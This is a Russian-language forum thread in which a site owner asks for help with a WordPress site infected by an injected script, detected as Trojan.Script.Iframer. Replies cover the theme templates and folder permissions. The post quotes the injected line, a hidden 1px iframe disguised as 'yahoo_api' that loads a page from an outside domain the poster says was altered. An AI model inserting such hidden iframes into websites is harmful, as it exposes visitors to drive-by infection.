При заходе на страницу http://budethorosho.by/new/carzor.html(будьте аккуратны, возможен вирус!), Касперский говорит о вирусе. Внизу кода появляется строка: <(iframe id="yahoo_api" style="width: 1px; height: 1px; display: none; " src="http://bidфвфonionвфis.orge.pl/iframe.php?id=2b8325qvzjut0iv8b87u9nlxnan0kpc"></iframe)>(изменено, чтобы не заразить любимый сайт).
Вирус ли это, где его искать и как с ним бороться?
Вирус ли это?
Пока сайт проверяется хостером и выдается ошибка 404. О результатах сообщу.
Помощь хостера:Доброе утро,
Вам следует искать вредоносный код в файлах шабона, я его переименовал в tapp-jobs1, а в tapp-jobs загрузил стандартный.
Директория с шаблонами – /domains/budethorosho.by/public_html/wp-content/themes/
Пиз*ец!
код вируса сам по себе появляется и исчезает. Хм…
Теперь Касперский ругается на главную страницу сайта, говоря о HEUR:Trojan.Script.Iframer
То снова сообщение о вирусе исчезает. Выручайте.
разберись с правами на папки чтобы никто туда ничего кроме тебя писать не мог.
Это уже стало понятно. Сейчас буду настраивать. После этого вирус исчезнет сам по себе?
Папки стояли 755
файлы 644
uploads 777
что не так?
А исполняемые файлы запускаются от какого имени?
P.s. По крайне мере сейчас каспер не ругается. Может хостер чего чудит.
Хостер чудит не то слово:
Последний ответ в стиле "справляйтесь сами"
А от какого имени должны запускаться, где их искать и что это такое?
Гуру, выручайте!